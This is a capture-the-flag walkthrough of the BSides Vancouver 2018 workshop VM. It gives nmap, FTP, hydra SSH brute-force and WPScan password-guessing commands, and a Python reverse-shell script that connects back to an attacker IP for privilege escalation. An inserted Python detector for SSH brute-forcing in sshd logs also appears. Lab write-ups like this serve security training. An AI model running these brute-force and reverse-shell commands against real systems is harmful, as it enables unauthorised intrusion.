Overview:

Name: BSides Vancouver: 2018 (Workshop)


Date release: 21 Mar 2018

Author: abatchy

Series: BSides Vancouver

Web page: https://www.abatchy.com/projects

Download:

https://www.dropbox.com/s/j3r9l7kaydwsdm9/BSides-Vancouver-2018-Workshop.ova

 

Method 1: Attack from the host side

Scan to discover the host IP:


 

Detailed host enumeration

╰─ nmap -v -p1-65535 -sV -O -sT 10.10.202.130

….

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.3.5

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

MAC Address: 00:0C:29:E9:7F:EE (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Uptime guess: 0.672 days (since Wed Mar  6 19:54:37 2019)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=249 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Attempting anonymous FTP login


The FTP share yields a backup file containing user names

╰─ cat users.txt.bk

abatchy

john

mai

anne

doomguy

Attempting SSH login


After trying each account, only the user anne has password login enabled, so we next try to brute-force that account.

Wordlists

git clone https://github.com/danielmiessler/SecLists.git

Kali Linux: /usr/share/wordlists/rockyou.txt

 

╰─ hydra -l anne -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.202.130 ssh


╰─ hydra -l anne -P /usr/share/wordlists/rockyou.txt 10.10.202.130 ssh
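How the hydra run against anne looks from the defender's side, as an added example that is not part of the original walkthrough: a sliding-window detector over sshd log lines that flags repeated password failures from one source and a successful login that follows them. The log lines, the host name bsides, the year, the thresholds and the function names are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth.log lines (not from the page): one mistyped password by a
# legitimate client, then a guessing run against anne that ends in a login.
SAMPLE_LOG = """\
Mar  6 20:00:10 bsides sshd[1190]: Failed password for anne from 10.10.202.1 port 50022 ssh2
Mar  6 20:00:15 bsides sshd[1190]: Accepted password for anne from 10.10.202.1 port 50022 ssh2
Mar  6 20:01:01 bsides sshd[1201]: Failed password for anne from 10.10.202.136 port 40112 ssh2
Mar  6 20:01:02 bsides sshd[1203]: Failed password for anne from 10.10.202.136 port 40114 ssh2
Mar  6 20:01:03 bsides sshd[1205]: Failed password for anne from 10.10.202.136 port 40116 ssh2
Mar  6 20:01:04 bsides sshd[1207]: Failed password for anne from 10.10.202.136 port 40118 ssh2
Mar  6 20:01:05 bsides sshd[1209]: Failed password for anne from 10.10.202.136 port 40120 ssh2
Mar  6 20:01:06 bsides sshd[1211]: Failed password for anne from 10.10.202.136 port 40122 ssh2
Mar  6 20:01:09 bsides sshd[1213]: Accepted password for anne from 10.10.202.136 port 40124 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2019):
    """Return alerts as (kind, source_ip, user, timestamp) tuples.
    Syslog timestamps carry no year, so the caller supplies one (assumption)."""
    recent = defaultdict(deque)  # (src, user) -> timestamps of failures inside the window
    flagged = set()              # (src, user) pairs that already crossed the threshold
    alerts = []
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["src"], m["user"])
        fails = recent[key]
        while fails and ts - fails[0] > window:  # expire failures older than the window
            fails.popleft()
        if m["result"] == "Failed":
            fails.append(ts)
            if len(fails) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", *key, ts))
        elif key in flagged:  # a login from a source that was just guessing passwords
            alerts.append(("success_after_bruteforce", *key, ts))
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The success_after_bruteforce alert is the one to page on: it means a guessed password worked, so the account's credentials and sessions need to be rotated and reviewed.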


 

Method 2: Starting from the web application


Directory discovery with dirb

╰─ dirb http://10.10.202.130/


Scanning with WPScan

# wpscan --update

# wpscan --url http://10.10.202.130/backup_wordpress/ --enumerate u # user enumeration

 


Brute-forcing the password

╰─ wpscan --url http://10.10.202.131/backup_wordpress/ --wordlist /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt --username john


Privilege escalation


./LinEnum.sh >> LinEnum.log


Shell.sh

#!/bin/bash

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.202.136",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'


Method 3: msf


Privilege escalation is the same as above: escalation through a scheduled task.

 
